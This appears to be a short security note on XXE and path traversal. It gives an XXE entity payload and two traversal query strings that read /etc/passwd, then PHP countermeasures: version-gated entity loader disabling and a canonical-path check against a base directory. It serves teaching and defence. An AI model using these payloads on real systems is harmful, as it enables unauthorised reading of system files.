Exploitation of XXE (XML External Entity) and Path Traversal vulnerabilities, with countermeasures.
<!-- XXE: read /etc/passwd -->
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>
# Path Traversal:
?file=../../../etc/passwd
?file=..%2F..%2F..%2Fetc%2Fpasswd # URL encoded
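// Defense PHP:
//
// XXE: libxml_disable_entity_loader() is deprecated since PHP 8.0, where external entity
// loading is already off by default. The durable rule is to never pass LIBXML_NOENT or
// LIBXML_DTDLOAD when parsing untrusted XML (e.g. simplexml_load_string($xml, 'SimpleXMLElement', 0)).
// The call is kept only for older runtimes, where it is still the effective switch.
if (PHP_VERSION_ID < 80000) {
    libxml_disable_entity_loader(true);
}

/**
 * Resolve $file relative to $base and return the canonical absolute path, or null when
 * the target does not exist, $base does not exist, or the target escapes $base.
 *
 * Fixes in this version compared to a bare realpath($base . $file) + strpos() prefix test:
 *  - $base is canonicalised too and compared with a trailing separator, so a base of
 *    "/srv/uploads" no longer also accepts "/srv/uploads_private/...".
 *  - realpath() returning false (missing file) is handled explicitly instead of relying
 *    on false being coerced to "" inside strpos().
 *  - An empty $base is rejected; with strpos() an empty prefix matches every path.
 * Because realpath() resolves symlinks, a link inside $base that points outside is rejected.
 * The base directory itself (e.g. $file === '' or '.') is not returned as a match.
 *
 * @return string|null canonical path inside $base, or null when the request must be refused
 */
function resolve_within_base(string $base, string $file): ?string
{
    $baseReal = realpath($base);
    if ($baseReal === false) {
        return null;
    }
    // Trailing separator turns the prefix test into a "same directory" test.
    $baseReal = rtrim($baseReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;

    $target = realpath($baseReal . $file);
    if ($target === false) {
        return null;
    }
    // strncmp() keeps this usable on PHP 7 as well as 8 (str_starts_with() is 8.0+).
    if (strncmp($target, $baseReal, strlen($baseReal)) !== 0) {
        return null;
    }
    return $target;
}

// Usage as in the original snippet: $real is the vetted absolute path or the request is refused.
if (isset($base, $file)) {
    $real = resolve_within_base($base, $file);
    if ($real === null) {
        die('Forbidden');
    }
}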